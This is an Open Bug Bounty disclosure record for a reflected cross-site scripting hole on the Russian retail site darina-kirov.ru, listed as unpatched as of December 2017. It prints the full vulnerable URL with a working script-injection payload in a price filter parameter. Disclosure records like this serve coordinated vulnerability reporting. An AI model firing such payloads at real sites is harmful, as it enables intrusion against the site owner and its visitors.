darina-kirov.ru XSS vulnerability

2017-09-05T11:25:00
ID OBB:289665
Type openbugbounty
Reporter Disst
Modified 2017-12-04T12:18:00

Description

Vulnerable URL:
http://darina-kirov.ru/products-category/tehnika-dlya-kuhni-i-doma/plity-gazovye/?orderby=menu_order&universal-filter;%5Bmeta_key%5D%5B_price%5D%5Bfrom%5D=4000.00%22%3E%3Cscript%3Ealert(/OPENBUGBOUNTY/)%3C/script%3E&universal-filter;%5Bmeta_key%5D%5B_price%5D%5Bto%5D=70000.00&universal-filter;%5Btaxonomy%5D%5Bpa_1-proizvoditel%5D%5B0%5D=9010&universal-filter;%5Btaxonomy%5D%5Bpa_shirina-sm%5D=9604&universal-filter;%5Btaxonomy%5D%5Bpa_glubina-sm%5D=9667&universal-filter;%5Btaxonomy%5D%5Bpa_gaz-kontrol-konforok%5D=9581&universal-filter;%5Btaxonomy%5D%5Bpa_elektropodzhig-stola%5D%5B0%5D=9370&universal-filter;%5Btaxonomy%5D%5Bpa_tip-duhovki%5D%5B0%5D=9308&universal-filter;%5Btaxonomy%5D%5Bpa_elektropodzhig-duhov%5D%5B0%5D=9373&universal-filter;%5Btaxonomy%5D%5Bpa_tajmer%5D=is_empty&universal-filter;%5Bpost-type%5D=product
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 04.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 3017050
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 5 September, 2017 11:25 GMT
Generic security notifications sent to website owner| 5 September, 2017 11:27 GMT
Vulnerability details disclosed by researcher| 4 December, 2017 12:18 GMT